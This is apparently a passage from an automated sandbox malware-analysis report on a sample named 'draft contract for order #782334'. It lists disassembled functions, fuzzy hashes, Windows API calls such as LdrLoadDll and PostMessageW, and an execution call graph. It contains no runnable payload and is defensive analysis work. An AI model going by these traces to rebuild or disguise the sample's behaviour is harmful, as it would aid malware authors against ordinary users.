                                                                                                                        • Opcode Fuzzy Hash: ccaebea50282e081ed38c439eea0e4417e35bf85a0f5f229ab7eeca4814bdd6e
                                                                                                                        • Instruction Fuzzy Hash: 961110B5C002598FDB10CF9AC844ADEFBF4EB88324F10842AD829B7650C379A545CFA1
                                                                                                                        Function 0B951148 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 0B9511AD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1772387333.000000000B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B950000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_b950000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePost
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 410705778-0
                                                                                                                        • Opcode ID: 1ef8b3af0d6dd1b6a4de24ad68d823f6051b9d0b869250c9871654b5909f5a78
                                                                                                                        • Instruction ID: 4e4a6e691e1786446bb41a8ab2e52c189a15e26a5bc48ff5f9961b30ce433a2b
                                                                                                                        • Opcode Fuzzy Hash: 1ef8b3af0d6dd1b6a4de24ad68d823f6051b9d0b869250c9871654b5909f5a78
                                                                                                                        • Instruction Fuzzy Hash: 9311D2B58002599FDB10DF9AD884BDEBBF8EB48324F10845AD958B7610C375A544CFA1
                                                                                                                        Function 0B951181 Relevance: 1.5, APIs: 1, Instructions: 30windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 0B9511AD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1772387333.000000000B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B950000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_b950000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePost
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 410705778-0
                                                                                                                        • Opcode ID: 89577f366677fe49b01209456bf6901cc4e846ebc110bdfd39bfc17ade0a9f4c
                                                                                                                        • Instruction ID: 9a4b5e4025398d8f0a18159c2f228ad723d617d9fb9df747fefce5c3519da3e8
                                                                                                                        • Opcode Fuzzy Hash: 89577f366677fe49b01209456bf6901cc4e846ebc110bdfd39bfc17ade0a9f4c
                                                                                                                        • Instruction Fuzzy Hash: ADF0E7B5900319DFDB10DF89D884BDEBBF4EB48314F10C45AE558A7210C379A584CFA1
                                                                                                                        Function 016CD3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1757453012.00000000016CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_16cd000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1b56a47422c10a9b3d662b0f4fb56a27ec2b824517adaf9556998f6bd8a01150
                                                                                                                        • Instruction ID: 112c0654b8b3ff9cc3c1f2e98da5915a83b7f1d7e5eb4d08ed393d9bd10873e2
                                                                                                                        • Opcode Fuzzy Hash: 1b56a47422c10a9b3d662b0f4fb56a27ec2b824517adaf9556998f6bd8a01150
                                                                                                                        • Instruction Fuzzy Hash: 2321E0B1500204EFDB05DF58D9C4B6AFF65EB98724F20C17DEA0A4A256C336E456CAE1
                                                                                                                        Function 016DD01C Relevance: .1, Instructions: 72COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1757514923.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_16dd000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a91ae220f4728abafc705ece1f7183eff90d50542bd5e7b8e822ad02b4e32535
                                                                                                                        • Instruction ID: 4dc0f49f46e666b12b51e24bf5f6c34782c2103358ac53b03edd52ebcbd86ab4
                                                                                                                        • Opcode Fuzzy Hash: a91ae220f4728abafc705ece1f7183eff90d50542bd5e7b8e822ad02b4e32535
                                                                                                                        • Instruction Fuzzy Hash: 8921F271A04200DFDB15EF68D984B26BFA5EBC8354F24C56DD90A4B396C33AD447CAA1
                                                                                                                        Function 016DD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1757514923.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_16dd000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4a818b8bb74b7fac913bf6d2d58c7ae8bbab5c45411a473e6f026f7a4692e125
                                                                                                                        • Instruction ID: 3a18e37329d8268d88222f98fb7801fb44bce72b1f21ecf09c1fded9c5021c30
                                                                                                                        • Opcode Fuzzy Hash: 4a818b8bb74b7fac913bf6d2d58c7ae8bbab5c45411a473e6f026f7a4692e125
                                                                                                                        • Instruction Fuzzy Hash: 5E210471944200EFDB05EF98DDC0F26BBA5FB84324F20C66DEA494B396C336D446CA61
                                                                                                                        Function 016DD005 Relevance: .1, Instructions: 63COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1757514923.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_16dd000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7956e559164daa86ba97d47ac96b3917cf6138f1b60b769301101a3a533ec3df
                                                                                                                        • Instruction ID: f323c35dccbe2a6dcf69edfe527594afb44951b8cb11a3cb62461ddbb7643fe4
                                                                                                                        • Opcode Fuzzy Hash: 7956e559164daa86ba97d47ac96b3917cf6138f1b60b769301101a3a533ec3df
                                                                                                                        • Instruction Fuzzy Hash: 802192755083809FCB03DF64D994711BF71EB86214F28C5EAD8498F2A7C33A980ACB62
                                                                                                                        Function 016CD3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1757453012.00000000016CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_16cd000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                        • Instruction ID: b2671ad3b93c5bcb4b38586c906ae6fe83c7e3d8babc8e0df13571e90b327331
                                                                                                                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                        • Instruction Fuzzy Hash: 7D11CD72404240DFDB02CF44D9C4B66BF61FB94224F24C2ADD9090A256C33AE45ACBA1
                                                                                                                        Function 016DD1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1757514923.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_16dd000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                        • Instruction ID: 309b5c8663a9bcd7ed5ce36d9a0a8681b845b7e89b23aec9df865f843abd6d75
                                                                                                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                        • Instruction Fuzzy Hash: AA11BB75904280DFDB02DF54C9C4B15BFB1FB84224F24C6AAD9494B796C33AD40ACB61

                                                                                                                        Non-executed Functions

                                                                                                                        Function 0791B7B0 Relevance: .3, Instructions: 344COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: efa6d53560a3d2f95676e129d1435e17d191de75ff98055d424aa0596f1fe0e2
                                                                                                                        • Instruction ID: c50ce48bca9f3183a6f687cbb7a74f1ca2ada99cb7667a21a3f7fb01e9c8354c
                                                                                                                        • Opcode Fuzzy Hash: efa6d53560a3d2f95676e129d1435e17d191de75ff98055d424aa0596f1fe0e2
                                                                                                                        • Instruction Fuzzy Hash: ECE1E9B4E001198FDB14CFA9C9809AEBBF6FF89304F24816AD415AB356D735AD42CF61
                                                                                                                        Function 0791BBF8 Relevance: .3, Instructions: 324COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ce9d6fa12735e22a76ca31e8514de7cce9dd42f3e88a218c2659f0f5b669302e
                                                                                                                        • Instruction ID: 5c431ba349a7adec325aaf1821198dec8042e8e1b07d173d0f6a53c851fb28d1
                                                                                                                        • Opcode Fuzzy Hash: ce9d6fa12735e22a76ca31e8514de7cce9dd42f3e88a218c2659f0f5b669302e
                                                                                                                        • Instruction Fuzzy Hash: 11E1D9B4E001198FCB14DFA9C9809AEFBB6FF89304F248169E815AB356D735AD41CF61
                                                                                                                        Function 07912618 Relevance: .3, Instructions: 312COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f0ff70c5ef12112e70af71a1bae36320fab4b79f54809ffbb0627b32b7afa507
                                                                                                                        • Instruction ID: 0be73a1291ee4337586a1267806e3cd501bf1301bd53261e69a7d06eb33ecbe2
                                                                                                                        • Opcode Fuzzy Hash: f0ff70c5ef12112e70af71a1bae36320fab4b79f54809ffbb0627b32b7afa507
                                                                                                                        • Instruction Fuzzy Hash: 49E1F9B4E101198FCB14DFA9C5809AEFBB2FF89304F248169E815AB356D735AD41CFA1
                                                                                                                        Function 0791D438 Relevance: .3, Instructions: 312COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5449347196068057e5de79aea9de4072bb01cd7d1e71e946a36ddf50f48c20e1
                                                                                                                        • Instruction ID: 6ea2431932a18a261dff7037187da332a0f4efcfa8c557eda378d84f2bb30f95
                                                                                                                        • Opcode Fuzzy Hash: 5449347196068057e5de79aea9de4072bb01cd7d1e71e946a36ddf50f48c20e1
                                                                                                                        • Instruction Fuzzy Hash: 59E1D7B4E005198FDB14CFA9C9809AEFBF6FF89304F248169D815AB356DB35A941CF60
                                                                                                                        Function 0791E1F0 Relevance: .3, Instructions: 312COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1dce6b0983c7a8087effd8ab91ce217c04ce0b9780f1736f6792e40ce952f640
                                                                                                                        • Instruction ID: b3c4db1b93ebe976c1e25707e97e29057ba5b5b8f6c7a80ac7021b5eee4c42ba
                                                                                                                        • Opcode Fuzzy Hash: 1dce6b0983c7a8087effd8ab91ce217c04ce0b9780f1736f6792e40ce952f640
                                                                                                                        • Instruction Fuzzy Hash: 93E1D8B4E001198FDB14CFA9C9809AEFBB6FF89305F248169E815AB356D734AD41CF61
                                                                                                                        Function 07912158 Relevance: .3, Instructions: 312COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 94f899161c35b3dd8ff56006b6d3f764886b0dfd1d1ecbae8911569b09c824ed
                                                                                                                        • Instruction ID: cddc990dbf0508d526cb46d428dd6d0776f831ad887afe4a4c27e05f48f18d7a
                                                                                                                        • Opcode Fuzzy Hash: 94f899161c35b3dd8ff56006b6d3f764886b0dfd1d1ecbae8911569b09c824ed
                                                                                                                        • Instruction Fuzzy Hash: DFE1EAB4E101198FCB14DFA9C5809AEFBB2FF89304F248569E815AB356D734AD41CFA0
                                                                                                                        Function 0791C040 Relevance: .3, Instructions: 312COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d5c1960196a7c6e08390a2eb937f5c1c04e431c53b5a0775cde812dd4330035e
                                                                                                                        • Instruction ID: f555206f93b5feb238684633ca1863d58b498fb56eecef14ac5b3fb11d67e74e
                                                                                                                        • Opcode Fuzzy Hash: d5c1960196a7c6e08390a2eb937f5c1c04e431c53b5a0775cde812dd4330035e
                                                                                                                        • Instruction Fuzzy Hash: 9BE1E7B4E401198FCB14CFA9C9809AEFBF6FF89304F248169E815AB356D734A941CF61
                                                                                                                        Function 07912EC8 Relevance: .3, Instructions: 312COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 282cc721e960ee41109543561e445c5d40a795698a3919c9e203e0ea349da86c
                                                                                                                        • Instruction ID: c05c1aeb2d659b74d6adb971f37519bc6bc46bf5bb2477c55a3fa3899465d640
                                                                                                                        • Opcode Fuzzy Hash: 282cc721e960ee41109543561e445c5d40a795698a3919c9e203e0ea349da86c
                                                                                                                        • Instruction Fuzzy Hash: 0BE1F9B4E101198FCB14DFA9C5809AEFBB2FF89304F248569E815AB356D735AD41CFA0
                                                                                                                        Function 07911D20 Relevance: .3, Instructions: 312COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c7d05470781a28891bdad83c900656ad088eeeb00b6a160e10313729f7fff7df
                                                                                                                        • Instruction ID: 1df67122ce02528ff15643e6aa826d50d2009f4c314035384061573fd10e09f0
                                                                                                                        • Opcode Fuzzy Hash: c7d05470781a28891bdad83c900656ad088eeeb00b6a160e10313729f7fff7df
                                                                                                                        • Instruction Fuzzy Hash: 04E10AB4E101198FCB14DFA9C5809AEFBB2FF89304F248169E915AB356D735AD41CFA0
                                                                                                                        Function 0172D344 Relevance: .3, Instructions: 264COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1757624562.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_1720000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 250fa5600a899ce5ad83d6e0ff5a847fd371fcd1bdaf25e1a63956640bd4c5e3
                                                                                                                        • Instruction ID: e18655ff71a51cc9940f3cf9d62d63e8daf25d186991913a5a7235e5f488dceb
                                                                                                                        • Opcode Fuzzy Hash: 250fa5600a899ce5ad83d6e0ff5a847fd371fcd1bdaf25e1a63956640bd4c5e3
                                                                                                                        • Instruction Fuzzy Hash: AEA19132E10229CFCF15DFB4C94499EFBB2FF84300B15856AE901AB265DB75E946CB40
                                                                                                                        Function 07915350 Relevance: .2, Instructions: 169COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 02b0e1a03356542fa13400ae0a388558351121bc224b8022a4376a28b734df5a
                                                                                                                        • Instruction ID: 59d854589ce6837a283d34469365a2d8c8575d89aea13e8696cd069aba63926d
                                                                                                                        • Opcode Fuzzy Hash: 02b0e1a03356542fa13400ae0a388558351121bc224b8022a4376a28b734df5a
                                                                                                                        • Instruction Fuzzy Hash: F67192B5E012198FCB04DFAAC5845DEFBF2BF88300F25D56AE418AB255DB34A942CF50
                                                                                                                        Function 07911D10 Relevance: .1, Instructions: 131COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8faddb423bff1660a1156331628d526732bedece7bf2372aa6b32c55824071d6
                                                                                                                        • Instruction ID: ac8d3d17e7702ece28e8b736827c66d7b3e81f88d9c65e55ebdf25a53e5788d0
                                                                                                                        • Opcode Fuzzy Hash: 8faddb423bff1660a1156331628d526732bedece7bf2372aa6b32c55824071d6
                                                                                                                        • Instruction Fuzzy Hash: 21513BB4E1021A8BCB14CFA9C9805AEFBF2FF89304F24C169D518A7356D735A941CFA1
                                                                                                                        Function 07915340 Relevance: .1, Instructions: 123COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1771109917.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7910000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 82c3b243b4e304804b64b48d61ffaae5aa198e8b2d21f6098d7a716299fce156
                                                                                                                        • Instruction ID: b732d326d54f67a04cfbcc20b66949888b590fc733ee552baa965c0a9e90acf4
                                                                                                                        • Opcode Fuzzy Hash: 82c3b243b4e304804b64b48d61ffaae5aa198e8b2d21f6098d7a716299fce156
                                                                                                                        • Instruction Fuzzy Hash: 2A5184B5E006598FDB08DFAAD98469EFBF2BF88300F15C52AD819AB354DB345946CF40

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:1.2%
                                                                                                                        Dynamic/Decrypted Code Coverage:5%
                                                                                                                        Signature Coverage:4.3%
                                                                                                                        Total number of Nodes:139
                                                                                                                        Total number of Limit Nodes:9
                                                                                                                        execution_graph 93165 42b903 93166 42b920 93165->93166 93169 1742df0 LdrInitializeThunk 93166->93169 93167 42b948 93169->93167 93170 424703 93171 42471f 93170->93171 93172 424747 93171->93172 93173 42475b 93171->93173 93174 42c343 NtClose 93172->93174 93180 42c343 93173->93180 93177 424750 93174->93177 93176 424764 93183 42e543 RtlAllocateHeap 93176->93183 93179 42476f 93181 42c360 93180->93181 93182 42c371 NtClose 93181->93182 93182->93176 93183->93179 93184 42f4c3 93185 42f4d3 93184->93185 93186 42f4d9 93184->93186 93189 42e503 93186->93189 93188 42f4ff 93192 42c683 93189->93192 93191 42e51e 93191->93188 93193 42c6a0 93192->93193 93194 42c6b1 RtlAllocateHeap 93193->93194 93194->93191 93232 424a93 93237 424aac 93232->93237 93233 424b39 93234 424af4 93235 42e423 RtlFreeHeap 93234->93235 93236 424b04 93235->93236 93237->93233 93237->93234 93238 424b34 93237->93238 93239 42e423 RtlFreeHeap 93238->93239 93239->93233 93195 41e223 93196 41e249 93195->93196 93200 41e343 93196->93200 93201 42f5f3 93196->93201 93198 41e2e4 93198->93200 93207 42b953 93198->93207 93202 42f563 93201->93202 93203 42f5c0 93202->93203 93204 42e503 RtlAllocateHeap 93202->93204 93203->93198 93205 42f59d 93204->93205 93211 42e423 93205->93211 93208 42b96d 93207->93208 93217 1742c0a 93208->93217 93209 42b999 93209->93200 93214 42c6d3 93211->93214 93213 42e43c 93213->93203 93215 42c6f0 93214->93215 93216 42c701 RtlFreeHeap 93215->93216 93216->93213 93218 1742c11 93217->93218 93219 1742c1f LdrInitializeThunk 93217->93219 93218->93209 93219->93209 93240 41b013 93241 41b057 93240->93241 93242 42c343 NtClose 93241->93242 93243 41b078 93241->93243 93242->93243 93244 413dd3 93245 413de0 93244->93245 93250 417513 93245->93250 93247 413e0b 93248 413e3f PostThreadMessageW 93247->93248 93249 413e50 93247->93249 93248->93249 93251 417537 93250->93251 93252 41753e 93251->93252 93254 41755d 93251->93254 93257 42f8a3 LdrLoadDll 93251->93257 93252->93247 93255 417573 LdrLoadDll 93254->93255 93256 41758a 93254->93256 93255->93256 93256->93247 93257->93254 93258 1742b60 LdrInitializeThunk 93259 401af6 93260 401b00 93259->93260 93263 42f993 93260->93263 93261 401c55 93261->93261 93266 42dff3 93263->93266 93267 42e016 93266->93267 93278 4074b3 93267->93278 93269 42e02c 93270 42e088 93269->93270 93281 41ae23 93269->93281 93270->93261 93272 42e04b 93273 42e060 93272->93273 93296 42c723 93272->93296 93292 427fd3 93273->93292 93276 42e07a 93277 42c723 ExitProcess 93276->93277 93277->93270 93280 4074c0 93278->93280 93299 416233 93278->93299 93280->93269 93282 41ae4f 93281->93282 93310 41ad13 93282->93310 93285 41ae94 93289 42c343 NtClose 93285->93289 93290 41aeb0 93285->93290 93286 41ae7c 93287 41ae87 93286->93287 93288 42c343 NtClose 93286->93288 93287->93272 93288->93287 93291 41aea6 93289->93291 93290->93272 93291->93272 93293 428035 93292->93293 93295 428042 93293->93295 93321 418383 93293->93321 93295->93276 93297 42c740 93296->93297 93298 42c751 ExitProcess 93297->93298 93298->93273 93300 416250 93299->93300 93302 416269 93300->93302 93303 42cdc3 93300->93303 93302->93280 93304 42cddd 93303->93304 93305 42ce0c 93304->93305 93306 42b953 LdrInitializeThunk 93304->93306 93305->93302 93307 42ce6c 93306->93307 93308 42e423 RtlFreeHeap 93307->93308 93309 42ce85 93308->93309 93309->93302 93311 41ad2d 93310->93311 93315 41ae09 93310->93315 93316 42b9f3 93311->93316 93314 42c343 NtClose 93314->93315 93315->93285 93315->93286 93317 42ba0d 93316->93317 93320 17435c0 LdrInitializeThunk 93317->93320 93318 41adfd 93318->93314 93320->93318 93323 4183ad 93321->93323 93322 4188ab 93322->93295 93323->93322 93329 413a53 93323->93329 93325 4184ce 93325->93322 93326 42e423 RtlFreeHeap 93325->93326 93327 4184e6 93326->93327 93327->93322 93328 42c723 ExitProcess 93327->93328 93328->93322 93333 413a73 93329->93333 93331 413adc 93331->93325 93332 413ad2 93332->93325 93333->93331 93334 41b133 RtlFreeHeap LdrInitializeThunk 93333->93334 93334->93332 93220 4138e6 93221 413872 93220->93221 93221->93220 93223 413895 93221->93223 93224 42c5e3 93221->93224 93225 42c5fd 93224->93225 93228 1742c70 LdrInitializeThunk 93225->93228 93226 42c625 93226->93223 93228->93226 93229 418ac8 93230 42c343 NtClose 93229->93230 93231 418ad2 93230->93231

                                                                                                                        Executed Functions

                                                                                                                        Function 00417513 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 400 417513-41752f 401 417537-41753c 400->401 402 417532 call 42f003 400->402 403 417542-417550 call 42f603 401->403 404 41753e-417541 401->404 402->401 407 417560-417571 call 42dac3 403->407 408 417552-417557 403->408 413 417573-417587 LdrLoadDll 407->413 414 41758a-41758d 407->414 409 41755d 408->409 410 417558 call 42f8a3 408->410 409->407 410->409 413->414
                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417585
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_draft contract for order #782334.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0
                                                                                                                        • Opcode ID: 5b7e103240ded1459ada72a1c913c8d9925025acccbb9aa8914370982d61623b
                                                                                                                        • Instruction ID: 83a4faa08aeb9e0cc7d1d2cc38f7fda52d0d200c19248de9a3f1e8e19a1a9c74
                                                                                                                        • Opcode Fuzzy Hash: 5b7e103240ded1459ada72a1c913c8d9925025acccbb9aa8914370982d61623b
                                                                                                                        • Instruction Fuzzy Hash: AD015EB1E4420DBBDB10DBE1DC42FDEB378AB54308F4041AAE90897241F635EB488B95
                                                                                                                        Function 0042C343 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C37A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_draft contract for order #782334.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Close
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3535843008-0
                                                                                                                        • Opcode ID: c327015965e002ba6da806d7b35ba06a045db85dc36153716a3361cbcbb9684d
